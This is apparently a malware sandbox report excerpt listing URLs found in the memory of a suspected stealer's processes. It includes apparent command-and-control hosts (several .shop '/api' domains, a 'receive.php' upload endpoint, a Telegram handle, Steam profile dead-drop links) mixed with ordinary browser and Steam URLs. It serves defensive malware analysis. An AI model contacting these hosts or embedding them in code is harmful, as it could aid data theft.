Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&l=e
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004E8000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: RegAsm.exe, 00000003.00000002.2126523047.00000000010A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.00000000011B7000.00000004.00000020.00020000.00000000.sdmp, BAECFH.3.dr	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: RegAsm.exe, 00000003.00000002.2126523047.00000000010A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.00000000011B7000.00000004.00000020.00020000.00000000.sdmp, BAECFH.3.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drawzhotdog.shop/api
Source: JJJJKE.3.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: JJJJKE.3.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: JJJJKE.3.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegAsm.exe, 0000000C.00000002.2189236179.0000000001445000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fragnantbui.shop/
Source: RegAsm.exe, 0000000C.00000002.2189236179.0000000001445000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fragnantbui.shop/HDQ
Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fragnantbui.shop/api2g
Source: JKEHIIJJEC.exe, 00000010.00000002.2516137174.0000000004B70000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/lontivero/Open.Nat/issuesOAlso
Source: JKEHIIJJEC.exe, 00000010.00000002.2514195438.000000000251E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hansgborn.eu
Source: JKEHIIJJEC.exe, 00000010.00000002.2514195438.0000000002481000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hansgborn.eu/receive.php
Source: JKEHIIJJEC.exe, 00000010.00000002.2514195438.000000000251E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hansgborn.eu/receive.phpd
Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.co
Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: BAECFH.3.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: RegAsm.exe, 00000003.00000002.2223847487.000000003E53F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2207871234.0000000032659000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2177878116.0000000020801000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2188004628.0000000026773000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr	String found in binary or memory: https://mozilla.org0/
Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://offensivedzvju.shop/pi
Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: RDPWInst.exe, 00000017.00000000.2112865515.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, RDPWInst.exe.16.dr	String found in binary or memory: https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniU
Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reinforcenh.shop/
Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/00
Source: RegAsm.exe, 0000000C.00000002.2189236179.0000000001445000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/0D
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: RegAsm.exe, 00000003.00000002.2126523047.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/S
Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/Z
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: RegAsm.exe, 00000003.00000002.2126523047.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/k
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2189236179.000000000144F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: RegAsm.exe, 0000000C.00000002.2189236179.000000000144F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: RegAsm.exe, 0000000C.00000002.2189236179.000000000144F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900C
Source: file.exe, 00000000.00000002.1436795595.0000000003AF5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2126523047.0000000001023000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, KECGDBFCBK.exe, 0000000D.00000002.2068049031.0000000003ACB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E32000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.0000000000437000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/badges
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/inventory/
Source: RegAsm.exe, 00000003.00000002.2126523047.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869PB
Source: RegAsm.exe, 0000000F.00000002.2527238904.0000000000E32000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869la$
Source: file.exe, 00000000.00000002.1436795595.0000000003AF5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, KECGDBFCBK.exe, 0000000D.00000002.2068049031.0000000003ACB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.0000000000437000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0
Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/r
Source: RegAsm.exe, 0000000F.00000002.2527238904.0000000000E32000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/s
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E32000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-Au
Source: RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2189236179.000000000144F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privac
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: RegAsm.exe, 00000003.00000002.2134152551.0000000019BBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000002.1436795595.0000000003AF5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, KECGDBFCBK.exe, 0000000D.00000002.2068049031.0000000003ACB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.0000000000437000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ae5ed
Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vozmeatillu.shop/api~
Source: RegAsm.exe, 0000000C.00000002.2177981551.000000000139A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wallkedsleeoi.shop/api
Source: RegAsm.exe, 00000003.00000002.2126523047.00000000010A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.00000000011B7000.00000004.00000020.00020000.00000000.sdmp, BAECFH.3.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: RegAsm.exe, 00000003.00000002.2223847487.000000003E53F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2207871234.0000000032659000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2177878116.0000000020801000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2188004628.0000000026773000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: JJJJKE.3.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, KECGDBFCBK.exe.3.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, EBAAFCAFCB.exe.3.dr	String found in binary or memory: https://www.entrust.net/rpa0
Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: JJJJKE.3.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: RegAsm.exe, 00000003.00000002.2126523047.00000000010A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.00000000011B7000.00000004.00000020.00020000.00000000.sdmp, BAECFH.3.dr	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: RegAsm.exe, 00000003.00000002.2134152551.0000000019BBC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: RegAsm.exe, 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/ost.exe
Source: RegAsm.exe, 00000003.00000002.2134152551.0000000019BBC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: RegAsm.exe, 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/IJKECBKFHD
Source: RegAsm.exe, 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: RegAsm.exe, 00000003.00000002.2134152551.0000000019BBC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: RegAsm.exe, 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
